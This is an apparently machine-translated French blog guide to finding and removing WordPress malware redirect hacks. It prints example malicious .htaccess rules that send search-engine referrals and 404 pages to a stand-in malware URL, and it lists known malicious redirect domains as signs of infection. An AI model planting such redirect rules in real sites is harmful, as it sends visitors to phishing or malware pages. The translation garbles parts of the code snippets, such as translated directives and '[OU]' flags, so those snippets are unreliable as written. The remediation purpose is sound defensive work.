Comment réparer le piratage de redirection de logiciels malveillants WordPress

Faire face à un piratage de redirection d’un logiciel malveillant WordPress, en général, est toujours une expérience frustrante. Les logiciels malveillants peuvent se présenter sous de nombreuses formes et présenter différents symptômes, pour ainsi dire. Elle peut modifier la présentation de votre site, ce que l’on appelle la défiguration, elle peut faire planter votre site ou même entraîner une perte partielle ou totale de contenu. Parfois, vous ne savez même pas qu’il est là.

Tout dépend du motif de l’attaque. Certaines personnes le font juste pour le plaisir. Oui, je sais – vous avez investi beaucoup d’argent, de temps et d’efforts dans votre site et cela fait vraiment mal de penser que quelqu’un le casse juste parce qu’il le peut et le veut. D’autre part, certains le font pour l’argent. Dans la plupart des cas, vous ne saurez pas pourquoi cela s’est produit.

La question la plus importante sera toujours : comment. Comment cela s’est-il produit et comment y remédier ? Dans cet article, nous aborderons le piratage de redirection de WordPress et ce qu’il faut faire à ce sujet.

Qu’est-ce qu’un “WordPress Malware Redirect Hack” ?

Le WordPress Redirect Hack est un processus qui redirige les visiteurs vers des sites de spam et de phishing dans le but de générer des impressions publicitaires. Il peut également s’agir d’une tentative de compromettre l’ordinateur d’un visiteur en lui proposant d’installer un logiciel qui agira en fait comme un logiciel malveillant.

À quoi cela ressemble-t-il ?

Diagnostiquer les redirections malveillantes de WordPress est assez simple car les symptômes sont évidents. Vous visitez votre site et au lieu de voir votre page d’accueil, vous êtes redirigé vers un autre endroit qui n’a absolument rien à voir avec votre site.

Les conséquences d’une redirection du malware WordPress

Quelles sont donc les conséquences d’un Redirect Hack (outre une hausse de votre tension artérielle) ? Tout ou partie de ces situations peuvent se produire :

  1. La réputation de votre site et de votre référencement sera dégradée (voire détruite)

Les visiteurs perdent tout simplement confiance après avoir été constamment redirigés vers des sites suspects.

2.Votre hébergeur pourrait fermer votre site

C’est exact. Votre fournisseur d’hébergement peut le faire si votre site est sur le serveur partagé afin d’éviter que d’autres sites ne soient également infectés.


3.Les dispositifs des visiteurs du site peuvent être compris et conduire à une faille de sécurité

Comme mentionné, il existe des moyens de faire parvenir des logiciels malveillants à l’ordinateur du visiteur et d’extraire des données sensibles.

4.Vous pourriez être mis sur la liste noire de Google
Google s’efforcera de protéger la réputation de ses résultats de recherche et marquera votre site comme étant peu sûr.

Comment détecter la redirection malveillante de WordPress

Pouvoir identifier le fichier compromis est l’étape la plus importante dans la suppression du logiciel malveillant. Toute installation de WordPress comporte des milliers de fichiers. Il va sans dire que la vérification manuelle de chacun d’entre eux n’est possible qu’en théorie.

L’idée principale ici est d’apprendre à confirmer que votre site a été compromis par le piratage de redirection et de décider ensuite de la meilleure marche à suivre pour le supprimer.

  1. Consulter le fichier .htaccess

Le .htaccess ne fait pas partie de WordPress. Il s’agit en fait d’un fichier de configuration du serveur Apache et, en tant que tel, il peut modifier le comportement par défaut du serveur. Le noyau de WordPress et certains plugins peuvent modifier automatiquement le .htaccess pour permettre aux utilisateurs de configurer les paramètres de sécurité, les redirections, les en-têtes de cache, etc.

Si un hacker met la main sur le fichier .htaccess, il peut lui aussi créer des redirections.

Il s’agit du contenu d’un fichier .htaccess généré par défaut par WordPress

Commencer WordPress

RewriteEngine On
RewriteBase /
RewriteRule ^index.php$ – [L]
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
Réécrire la règle . /index.php [L]

END WordPress

Le fichier .htaccess peut avoir beaucoup plus de lignes, pour le contrôle du cache, la sécurité et la redirection https et il n’y a pas de quoi s’inquiéter. Toutefois, certaines lignes de réacheminement sont préoccupantes.

Un des types d’attaques .htaccess redirige les utilisateurs qui proviennent des moteurs de recherche. Voici un exemple de ce code :

RewriteCond %{HTTP_REFERER} google. [OU] #vérifie si le visiteur a été référé par Google
RewriteCond %{HTTP_REFERER} .ask. [OR] #check if the visitor has been referred by Ask.com
RewriteCond %{HTTP_REFERER} .yahoo. [OU] #vérifie si le visiteur a été référé par Yahoo
RewriteCond %{HTTP_REFERER} .baidu. [OU] #check if the visitor has been referred by Baidu
RewriteRule ^(.*)$ http://malicioussite.com/malware.php [R=301,L] #si l’une des règles ci-dessus est “vraie”, c’est ici que l’utilisateur est redirigé

Cela peut également se faire sous forme abrégée, alors faites attention à cela aussi :

RewriteEngine On
RewriteCond %{HTTP_REFERER} ^.(google|ask|yahoo|baidu).(.) #Check if the visitor has been referred by Google or Ask or Yahoo or Baidu
RewriteRule ^(.*)$ http://malicioussite.com/malware.php [R=301,L] #La même redirection

Ce type de redirection est très bien dissimulé et il peut s’écouler des mois avant que le propriétaire du site ne le remarque ou qu’un visiteur ne le signale. En effet, toute personne se rendant directement sur le site ne remarquera aucune différence. C’est essentiellement le même principe que celui suivi par Pharma Hack.

Il existe également un moyen de rediriger toutes les pages d’erreur (comme 404, 503, etc.) vers des sites malveillants en utilisant l’extrait de fichier .htaccess suivant

RewriteEngine On
ErrorDocument 404 http://malicioussite.com/malware.php

Ce code .htaccess supplémentaire redirigera le visiteur vers un site malveillant au lieu d’un modèle de 404 pages.

  1. Recherchez les redirections malveillantes dans vos fichiers, thèmes et plugins WordPress

Le fait de voir un code similaire aux exemples présentés ci-dessus confirme que votre site a été piraté. La suppression de ces lignes empêchera vos visiteurs d’être redirigés, mais malheureusement, cela ne signifie pas que le piratage de redirection des logiciels malveillants a été entièrement supprimé. Il y a probablement des fichiers malveillants détournés que le pirate informatique a utilisés pour accéder à votre site. Si ces portes dérobées restent sur le site, votre .htaccess et votre site WordPress seront éventuellement modifiés et infectés à nouveau.

Si vous n’êtes pas sûr que le code de votre .htaccess soit un logiciel malveillant ou non, ou si vous ne vous sentez pas à l’aise pour le modifier, il peut être judicieux de créer une sauvegarde et de la remplacer par le htaccess WordPress par défaut.

  1. Vérifiez que votre thème header.php et footer.php ne contient pas d’injections de code malveillant

Header.php et footer.php sont des fichiers de modèles de base. Tous les thèmes WordPress en ont. Ils peuvent avoir des fichiers supplémentaires qui sont appelés à partir de header.php et footer.php mais ces deux fichiers seront toujours là. Une exception est si votre thème utilise un thème enfant qui ne nécessite rien d’autre qu’un fichier style.css pour fonctionner mais dans ce cas, header.php et footer.php sont déjà chargés à partir du thème parent. Conclusion – ils seront chargés d’une manière ou d’une autre.

Les pirates informatiques le savent, c’est pourquoi ils mettent souvent un code malveillant dans ces deux fichiers ou dans les fichiers qui y sont inclus. Ce code n’est pas si difficile à repérer une fois que vous savez ce qu’il faut chercher. Voici quelques caractéristiques du code :

  • Il sera souvent obscurci
  • Il aura les fonctions “base64()” et “eval()”.

Consultez l’exemple suivant :

Le code ci-dessus est un exemple de ce que vous pourriez trouver dans votre fichier header.php. Voici à quoi cela ressemble lorsqu’il est décodé avec la fonction base64_decode() :

L’exemple de code est destiné à rediriger les visiteurs en fonction de certains paramètres vers un domaine appelé default7 .com et, plus bas, il comporte une chaîne de redirection basée sur certaines conditions qui s’appliquent individuellement aux visiteurs du site piraté. Les pirates de redirection de logiciels malveillants sont connus pour utiliser des chaînes de redirection qui redirigent les visiteurs de sites infectés vers les domaines suivants :

  • default7 .com
  • test246.com
  • test0 .com
  • distinctfestive .com
  • ableoccassion.com

Si vous en voyez la moindre mention dans votre dossier, c’est la confirmation à 100% que vous avez été piraté.

Comment nettoyer le hack de redirection des logiciels malveillants de WordPress
Si vous avez trouvé des injections de code similaires dans les fichiers de votre site WordPress, il y a trois choses que vous pouvez faire pour récupérer votre site WordPress piraté. Avant de poursuivre la lecture, nous devons vous avertir qu’il faut d’abord créer une sauvegarde des fichiers et de la base de données de votre site WordPress et la compresser dans un fichier zip. Enfin et surtout, stockez le fichier localement pour pouvoir y accéder facilement si vous décidez de le restaurer.

  1. Remplacez votre thème WordPress actif par une copie fraîchement téléchargée
    Supprimez vos fichiers de thème WordPress actuels et remplacez-les par ceux que vous venez de télécharger. N’oubliez pas que si vous avez codé en dur des modifications dans vos fichiers de thème, vous devrez les appliquer à nouveau.
  2. Remplacer les fichiers WordPress de base infectés par les fichiers originaux
    La prochaine étape consiste à supprimer vos anciens fichiers de base WordPress et à les remplacer par ceux que vous venez de télécharger sur WordPress.org. Dans ce cas, vous devez vous assurer que vous appliquez également les mises à jour en cours. Une nouvelle installation de WordPress compte actuellement 1835 fichiers. Ajoutez des plugins, des thèmes et ce nombre augmente rapidement. Vous ne pouvez pas vérifier tous les dossiers. C’est pourquoi il est important de parcourir les dossiers dans un certain ordre.

Le premier fichier qui se charge lorsque quelqu’un visite votre site est “index.php”. Il est assez facile de dire si le dossier a été falsifié. Il devrait avoir une taille de 418 à 420 octets et ne devrait charger qu’un seul fichier en utilisant la fonction “require()” :
require( dirname( FILE ) . /wp-blog-header.php’ ) ;

Si vous voyez un autre fichier chargé avec la fonction “require()”, il s’agit très probablement d’un malware.

Il en va de même pour “wp-config.php”, qui ne doit comporter qu’une seule ligne où la fonction “require()” a été utilisée (tout en bas) :

require_once( ABSPATH . ‘wp-settings.php’ ) ;

Cependant, certains hébergeurs chargent certains fichiers ou plugins requis via le fichier wp-config.php, ce qui peut ajouter une certaine confusion. Mais voici la différence : un fournisseur d’hébergement ne mettra jamais le fichier dans le répertoire wp-admin et wp-includes, mais plutôt dans wp-content/plugins. Si une fonction “require()” a été appelée pour récupérer un fichier autre que wp-settings.php dans ces répertoires, il s’agit très probablement d’un malware.

  1. Remplacer tous vos plugins WordPress
    C’est la meilleure solution lorsqu’il s’agit de préserver la fonctionnalité et la présentation du site. C’est également la pire solution si vous avez laissé des parties du code du logiciel malveillant. Cela peut entraîner des erreurs, une réinfection, un effondrement du site, etc. Si votre thème a été personnalisé, demandez à votre développeur de supprimer les logiciels malveillants pour vous, ou s’ils ne sont pas disponibles, engagez un professionnel pour le faire à votre place.
  2. Supprimer les sauvegardes de vos fichiers WordPress
    Si vous conservez des sauvegardes de vos installations WordPress, il y a de fortes chances pour qu’elles contiennent également des logiciels malveillants et que vous ne puissiez donc pas les utiliser pour restaurer entièrement votre site WordPress. Si ces sauvegardes sont stockées sous forme de fichiers bruts, les logiciels malveillants peuvent réinfecter votre site à maintes reprises.
  3. Nettoyez vos fichiers de cache WordPress
    La mise en cache de votre site WordPress est un moyen de stocker vos fichiers statiques, ce qui accélère leur chargement. Cela signifie également que les fichiers de logiciels malveillants sont également mis en cache et prêts à être manipulés par les pirates. Nous vous suggérons de supprimer tout le cache de votre site et de le désactiver complètement jusqu’à ce que vous soyez sûr de l’avoir nettoyé.
  4. Modifier vos données de connexion à l’administration de WordPress
    Un site WordPress piraté signifie que tout le contenu de votre site, y compris les identifiants des utilisateurs de l’administration, a été piraté ou manipulé. Cela dit, vous devez changer tous vos noms d’utilisateur et mots de passe administratifs avec de nouveaux. Veillez à réinitialiser également vos clés de sel wp-config.php afin que tous les utilisateurs connectés soient déconnectés de force.
  5. Ne pas utiliser plus de 2 comptes admin
    Nous suggérons fortement de ne laisser qu’un ou deux comptes d’administrateur et de déclasser tous les autres pour des rôles d’utilisateurs inférieurs tels qu’auteurs et éditeurs. Moins d’administrateurs signifie moins de possibilités d’avoir un de ces comptes piraté et d’infecter votre site WordPress avec des logiciels malveillants.

Si vous avez besoin de plus d’un ou deux administrateurs actifs, vous pouvez utiliser notre propre plugin d’administration des utilisateurs WP afin de programmer des changements de rôle ou des mises à niveau. De cette façon, vous pouvez définir un utilisateur comme administrateur pour une durée déterminée et le rétrograder automatiquement au rang d’auteur ou à tout autre rôle d’utilisateur privilégié.

  1. Supprimer les thèmes et plugins inactifs
    L’un des points d’entrée les plus courants pour les pirates est l’inactivité et l’abandon des plugins et des thèmes. Si vous n’utilisez pas un plugin ou un thème, il est préférable de le compléter, de le supprimer de votre site WordPress, sinon vous risquez de vous faire pirater encore et encore à cause de vulnérabilités trouvées dans des thèmes qui ne sont plus développés.
  2. Modifier vos données de connexion à la base de données
    Les sites WordPress piratés sont également la conséquence de l’utilisation de données de connexion simples et amusantes pour leur base de données MySQL. Assurez-vous de créer un nom d’utilisateur et un mot de passe uniques pour chaque base de données WordPress que vous créez sous votre compte d’hébergement.
  3. Vérifiez votre fichier wp-config.php pour les injections de script
    L’un des premiers fichiers qu’un pirate informatique utilise pour injecter des logiciels malveillants est wp-config.php. Ceci est le principal

Il s’agit du fichier principal de WordPress. Son exploitation permet donc au pirate de diffuser plus facilement des logiciels malveillants dans tous les fichiers de votre site WordPress. Il peut également être utilisé pour infecter d’autres sites WordPress hébergés sous le même compte d’hébergement.

Le moyen le plus sûr de nettoyer ce fichier est de noter les détails de connexion à la base de données WordPress (nom de la base de données, nom d’utilisateur, mot de passe et préfixe de table, de supprimer le fichier wp-config.php en direct et d’utiliser le fichier wp-config.php par défaut (qui se trouve sous le nom de wp-config-sample.php) et d’insérer les détails de la base de données en direct.

  1. Modifier les clés d’authentification de votre fichier wp-configh.php
    Une fois que vous avez restauré le fichier wp-config.php par défaut, remplacez les clés d’authentification en en générant de nouvelles.
  2. Mettez à jour votre installation WordPress
    Les logiciels malveillants se répandent généralement dans les fichiers de base de votre site WordPress, aussi, pour faire suite à l’étape 2, nous vous suggérons de mettre également à jour votre WordPress. Il existe une option pour cet emploi dans votre page de mise à jour du tableau de bord WordPress.
  3. Vérifiez la présence de logiciels malveillants dans votre répertoire de médias
    Parcourez votre répertoire wp-content/uploads à l’aide d’un client FTP ou du gestionnaire de fichiers de votre panneau d’hébergement et recherchez les fichiers .php, .js et .ico dans vos répertoires média. Vos répertoires de médias ne doivent contenir que des fichiers statiques comme des images et des pdf.
  4. Suivez la même procédure pour tous les autres sites WordPress
    Si vous hébergez d’autres sites WordPress sous le même compte d’hébergement, ils peuvent également être infectés. Dans ce cas, vous devez les nettoyer toutes sans poser de questions, sinon le reste du site WordPress ré-infectera les sites récemment nettoyés.

Il est tout aussi important de nettoyer votre site WordPress de la redirection des logiciels malveillants que de trouver les raisons pour lesquelles votre site a été infecté au départ. De cette façon, vous éviterez que le piratage ne se reproduise. Lorsque vous apprenez comment votre site a été piraté, vous avez une longueur d’avance sur le pirate. Vous pouvez localiser les fichiers contenant des codes malveillants et supprimer toute porte dérobée ayant accordé au pirate des privilèges d’administrateur. Il vous aidera également à acquérir une certaine expérience en matière de nettoyage de sites WordPress piratés, ce qui vous permettra de mieux sécuriser de manière proactive vos autres sites WordPress

  1. Logiciels obsolètes
    Les logiciels obsolètes (noyau, thèmes et plugins WordPress) sont la principale cause de vulnérabilité. Les pirates connaissent généralement les faiblesses dès le départ car les vulnérabilités de sécurité sont parfois notées dans les journaux des modifications.
  2. Vulnérabilités des plugins
    Parfois, même les dernières mises à jour peuvent contenir des bogues – prenez 5 minutes pour lire un problème qui s’est produit avec un exploit 0-Day dans l’une des versions du plugin Easy WP SMTP.
  3. Des références prévisibles
    L’utilisation d’identifiants prévisibles (je vous regarde, utilisateur “admin” !) facilite grandement le succès des attaques par force brute. Si quelqu’un obtient l’accès à l’administration soit en détournant votre utilisateur actuel ou en créant un administrateur fantôme par le biais d’une vulnérabilité, vous avez officiellement perdu le contrôle de votre site.
  4. Utilisation des thèmes et plugins annulés
    Permettez-moi de dire que je comprends parfaitement la tentation. Vous pensez peut-être que vous pouvez économiser 50 à 60 dollars sur ce thème, sans parler de ces extensions WooCommerce très coûteuses qui peuvent atteindre 249 dollars. Chaque année. Vous pensez peut-être aussi que vous pouvez réorienter cet argent et l’utiliser pour le marketing. N’est-ce pas ? Faux.

Rien dans ce monde n’est gratuit. Les thèmes nuls ne sont pas une exception. Ils seront livrés avec des logiciels publicitaires, des logiciels contre rançon ou tout autre type de logiciel. Lorsque cela commencera à ramper sur votre site, l’argent que vous aurez économisé sera de la petite monnaie par rapport à ce que vous allez dépenser pour nettoyer votre site et réparer les dégâts (qui peuvent être totaux).

Comment protéger votre site WordPress contre un nouveau piratage


Avant de faire des suggestions, je vais être tout à fait honnête. Quoi que vous fassiez et quel que soit votre dévouement pour sécuriser votre site, il y a toujours une possibilité que quelqu’un réussisse à le pirater. Si cela vous donne envie de nous crier dessus dans la section des commentaires, je comprends tout à fait, mais permettez-moi de m’étendre.

Votre travail consiste à ne pas faciliter le piratage de votre site par quiconque. La possibilité sera toujours là, mais la rapidité avec laquelle vous la saisissez et la rapidité de votre réaction peuvent faire une grande différence. Si vous disposez d’une sécurité adéquate, il y a de fortes chances que votre site ne subisse aucun dommage grave et que vous puissiez tout ramener à la normale en un rien de temps.

Dans cet esprit, voici la liste des choses que vous souhaitez faire pour assurer la sécurité de votre site :

  • Protéger la page de connexion
  • Sécurisez vos dossiers et votre base de données
  • Mettez à jour vos thèmes, plugins et fichiers de base WordPress
  • Appliquer des restrictions pour les bots, certains PA et pays
  • Surveillez votre site

Vous trouverez ici un article de fond sur la manière de protéger votre site WordPress contre le piratage.

Il est également conseillé de s’abonner à un service de sécurité WordPress. Cela vous permettra de surveiller constamment le site et de réagir rapidement en cas de problème. Il s’ajoute aux dépenses mensuelles et peut ne pas convenir à tous les budgets, mais cela dépend surtout de ce que votre site représente pour vous et de ce que vous êtes prêt à dépenser pour le sécuriser.

Leave a Comment